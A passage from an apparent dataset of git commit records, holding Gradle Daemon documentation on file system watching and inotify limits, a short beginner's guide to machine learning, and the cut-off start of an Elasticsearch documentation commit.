JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects a lot of information about the state of the file system during every build.\nWhen <<sec:daemon_watch_fs,watching the file system>> is enabled, the Daemon can re-use the already collected information from the last build.\nThis can save a significant amount of time for incremental builds, where the number of changes to the file system between two builds is typically low.\n\n[[sec:daemon_watch_fs]]\n== Watching the file system\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects information about the file system in-memory during every build (aka _Virtual File System_).\nBy watching the file system, Gradle can keep the Virtual File System in sync with the file system even between builds.\nDoing so allows the Daemon to save the time to rebuild the Virtual File System from disk for the next build.\nFor incremental builds, there are typically only a few changes between builds.\nTherefore, incremental builds can re-use most of the Virtual File System from the last build and benefit the most from watching the file system.\n\nGradle uses operating system features for watching the file system.\nIt supports the feature on these operating systems and file systems:\n\n- Windows 10 with NTFS,\n- Linux (Ubuntu 16.04 or later, CentOS 8 or later, Red Hat Enterprise Linux 8 or later, Amazon Linux 2) using ext3 and ext4,\n- macOS 10.14 (Mojave) or later on APFS and HFS+.\n\nNetwork file systems like NFS and SMB are not supported.\nFAT file systems are not supported.\n\nWatching the file system is an experimental feature and is disabled by default.\nYou can enable the feature in a couple of ways:\n\nRun with `--watch-fs` on the command line::\nThis enables watching the file system for this build only.\nPut `org.gradle.vfs.watch=true` in your `gradle.properties`::\nThis enables watching the file system for all builds, unless explicitly disabled with `--no-watch-fs`.\n\n[[sec:daemon_watch_fs_troubleshooting]]\n=== Troubleshooting file system watching\n\nLimitations::\nFile system watching currently has the following limitations:\n- If you have symlinks in your build, you won\u2019t get the performance benefits for those locations (we plan to change this in the future).\n- When multiple daemons are running, the idle ones can pick up the changes produced by the others and create large log files with lots of debug info about the changes.\n- On Windows, we don\u2019t support SUBST and network drives (they might work, but we don\u2019t test them yet).\n\nGradle does not pick up some of my changes.::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nIf your build declares its inputs and outputs correctly, this should not happen.\nSo it\u2019s either a bug we need to fix, or your build is lacking the declaration of some inputs or outputs.\n\nWhy am I always getting \u201cReceived 8 file system events since last build\u201d even though I only changed one file?::\nThese are harmless notifications about changes to Gradle's own caches that happen after file watching has started.\n\n`Dropped VFS state due to lost state`::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nThis message means that either\n+\n--\n- the daemon received some unknown file system event,\n- too many changes happened, and the watching API couldn\u2019t handle it.\n--\nIn both cases the build cannot benefit from file system watching.\n\n`java.io.IOException: Too many open files`::\nIf you receive this error on macOS, you need to raise your open files limit, see https:\/\/superuser.com\/a\/443168\/8117[here].\n\n[[sec:inotify_watches_limit]]\n=== Linux-specific notes\n\nFile system watching uses http:\/\/en.wikipedia.org\/wiki\/Inotify[inotify] on Linux.\nDepending on the size of your build, it may be necessary to increase inotify limits.\nIf you are using an IDE, then you probably already had to increase the limits in the past.\n\nFile system watching uses one inotify watch per watched directory.\nYou can see the current limit of inotify watches per user by running:\n\n[source,bash]\n----\ncat \/proc\/sys\/fs\/inotify\/max_user_watches\n----\n\nTo increase the limit to e.g. 512K watches run the following:\n\n[source,bash]\n----\necho 524288 | sudo tee -a \/etc\/sysctl.conf\nsudo sysctl -p --system\n----\n\nEach used inotify watch takes up to 1KB of memory.\nAssuming inotify uses all the 512K watches then around 500MB will be used for watching the file system.\nIf your environment is memory constraint, you may want to disable file system watching.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not \u2014 everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<third_party_integration.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects a lot of information about the state of the file system during every build.\nWhen <<sec:daemon_watch_fs,watching the file system>> is enabled, the Daemon can re-use the already collected information from the last build.\nThis can save a significant amount of time for incremental builds, where the number of changes to the file system between two builds is typically low.\n\n[[sec:daemon_watch_fs]]\n== Watching the file system\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects information about the file system in-memory during every build (aka _Virtual File System_).\nBy watching the file system, Gradle can keep the Virtual File System in sync with the file system even between builds.\nDoing so allows the Daemon to save the time to rebuild the Virtual File System from disk for the next build.\nFor incremental builds, there are typically only a few changes between builds.\nTherefore, incremental builds can re-use most of the Virtual File System from the last build and benefit the most from watching the file system.\n\nGradle uses operating system features for watching the file system.\nIt supports the feature on these operating systems and file systems:\n\n- Windows 10 with NTFS,\n- Linux (Ubuntu 16.04 or later, CentOS 8 or later, Red Hat Enterprise Linux 8 or later, Amazon Linux 2) using ext3 and ext4,\n- macOS 10.14 (Mojave) or later on APFS and HFS+.\n\nNetwork file systems like NFS and SMB are not supported.\nFAT file systems are not supported.\n\nWatching the file system is an experimental feature and is disabled by default.\nYou can enable the feature in a couple of ways:\n\nRun with `--watch-fs` on the command line::\nThis enables watching the file system for this build only.\nPut `org.gradle.vfs.watch=true` in your `gradle.properties`::\nThis enables watching the file system for all builds, unless explicitly disabled with `--no-watch-fs`.\n\n[[sec:daemon_watch_fs_troubleshooting]]\n=== Troubleshooting file system watching\n\nLimitations::\nWe are working on removing the following limitations to make file system watching production ready.\n- If you have symlinks in your build, you won\u2019t get the performance benefits for those locations (we plan to change this in the future).\n- When multiple daemons are running, the idle ones can pick up the changes produced by the others and create large log files with lots of debug info about the changes.\n- On Windows, we don\u2019t support SUBST and network drives (they might work, but we don\u2019t test them yet).\n\nGradle does not pick up some of my changes.::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nIf your build declares its inputs and outputs correctly, this should not happen.\nSo it\u2019s either a bug we need to fix, or your build is lacking the declaration of some inputs or outputs.\n\nWhy am I always getting \u201cReceived 8 file system events since last build\u201d even though I only changed one file?::\nThese are harmless notifications about changes to Gradle's own caches that happen after file watching has started.\n\n`Dropped VFS state due to lost state`::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nThis message means that either\n+\n--\n- the daemon received some unknown file system event,\n- too many changes happened, and the watching API couldn\u2019t handle it.\n--\nIn both cases the build cannot benefit from file system watching.\n\n`java.io.IOException: Too many open files`::\nIf you receive this error on macOS, you need to raise your open files limit, see https:\/\/superuser.com\/a\/443168\/8117[here].\n\n[[sec:inotify_watches_limit]]\n=== Linux-specific notes\n\nFile system watching uses http:\/\/en.wikipedia.org\/wiki\/Inotify[inotify] on Linux.\nDepending on the size of your build, it may be necessary to increase inotify limits.\nIf you are using an IDE, then you probably already had to increase the limits in the past.\n\nFile system watching uses one inotify watch per watched directory.\nYou can see the current limit of inotify watches per user by running:\n\n[source,bash]\n----\ncat \/proc\/sys\/fs\/inotify\/max_user_watches\n----\n\nTo increase the limit to e.g. 512K watches run the following:\n\n[source,bash]\n----\necho 524288 | sudo tee -a \/etc\/sysctl.conf\nsudo sysctl -p --system\n----\n\nEach used inotify watch takes up to 1KB of memory.\nAssuming inotify uses all the 512K watches then around 500MB will be used for watching the file system.\nIf your environment is memory constraint, you may want to disable file system watching.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5dab4e84ec57e89ab42a942be248a2ed48cf3ac0","subject":"Update 2015-06-12-Noobs-guide-to-Machine-Learning.adoc","message":"Update 2015-06-12-Noobs-guide-to-Machine-Learning.adoc","repos":"anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io","old_file":"_posts\/2015-06-12-Noobs-guide-to-Machine-Learning.adoc","new_file":"_posts\/2015-06-12-Noobs-guide-to-Machine-Learning.adoc","new_contents":"= Noob's guide to Machine Learning\n:hp-tags: machine learning\n\n\nYou might be completely overwhelmed by the information available over the internet\nand must be looking on how to start the journey in the world of data analytics,\ndon't worry we are here to help , below you will find must know things to get \nstarted and learn everything about machine learning. +\n\nOne can directly get started using various available tools like R studio, Amazon machine learning as a service\nAzure Machine learning, Anaconda(ipython) etc.\nbut before you do that you must know the basics or building blocks of machine learning approach.+\n\n*Neural nets*\/ *Support Vector Machine* etc might sound great but these model\nimplentaion is the last step. The most important step is cleaning and processing the data,\nwe will talk about it later in detail.\n\nFor now, following topics are the building blocks, we will post about each of\nthem in seperate posts .\n\n\n\n\n. *Statistics*\n. *Linear Algebra*\n. *Data Cleaning*\n. *Data Processing (Dimension Reduction)*\n. *Feature Selection*\n\n\nIt's time to clean the dust off your Math\/Statistics book and revise the concepts about Linear algebra and Mean\/Mode\/Standard Deviation , till you do that we will write the post\nabout next step, where we will learn a algortihm *(PCA)* for data processing and get hands on data cleaning and processing step using Anaconda(ipython).\n\nDon't worry if this information also overwhelmed you , we will teach you \neach and everything, Just stick with us.\n\n*Happy Learning, See you next week*\n\n\n","old_contents":"= Noob's guide to Machine Learning\n:hp-tags: Machine Learning\n\nYou might be completely overwhelmed by the information available over the internet \nand must be looking on how to start the journey in the world of data analytics, \ndon\u2019t worry we are here to help , below you will find must know things to get started \nand learn everything about machine learning. \n\nOne can directly get started using various available tools like R studio, \nAmazon machine learning as a service Azure Machine learning, Anaconda(ipython) etc. \nbut before you do that you must know the basics or building blocks of machine learning approach.\n\n*Neural nets*\/ *Support Vector Machine* etc. might sound great but these model implementation is the last step.\nThe most important step is cleaning and processing the data, we will talk about it later in detail.\n\nFor now, following topics are the building blocks, we will post about each of them in separate posts .\n\n\t. Statistics\n . Linear Algebra\n\t. Data Cleaning\n\t. Data Processing (Dimension Reduction)\n . Feature Selection\n\nIt\u2019s time to clean the dust off your Math\/Statistics book and revise the concepts about Linear algebra \nand Mean\/Mode\/Standard Deviation , till you do that we will write the post about next step, \n\nwhere we will learn a algorithm (PCA) for data processing and get hands on data cleaning \nand processing step using Anaconda(ipython).\n\nDon\u2019t worry if this information also overwhelmed you , we will teach you each and everything, Just stick with us.\n\nHappy Learning, See you next week\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6f17736eb1b92a0438c4639a27c04c2f2e97129d","subject":"Fixed asciidoc","message":"Fixed asciidoc\n","repos":"nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,ricardocerq\/elasticsearch,strapdata\/elassandra5-rc,mjason3\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,zkidkid\/elasticsearch,nknize\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,MaineC\/elasticsearch,markwalkom\/elasticsearch,spiegela\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,dpursehouse\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,alexshadow007\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,geidies\/elasticsearch,fernandozhu\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,elasticdog\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,nezirus\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,mikemccand\/elasticsearch,awislowski\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,zkidkid\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,girirajsharma\/elasticsearch,jimczi\/elasticsearch,awislowski\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,dpursehouse\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,sreeramjayan\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,brandonkearby\/elasticsearch,JervyShi\/elasticsearch,MaineC\/elasticsearch,jprante\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,dpursehouse\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,JackyMai\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,mikemccand\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,mjason3\/elasticsearch,gmarz\/elasticsearch,uschindler\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,sreeramjayan\/elasticsearch,mikemccand\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,s1monw\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,awislowski\/elasticsearch,pozhidaevak\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,girirajsharma\/elasticsearch,elasticdog\/elasticsearch,girirajsharma\/elasticsearch,alexshadow007\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,fernandozhu\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,liweinan0423\/elasticsearch,a2lin\/elasticsearch,ricardocerq\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,spiegela\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,awislowski\/elasticsearch,kalimatas\/ela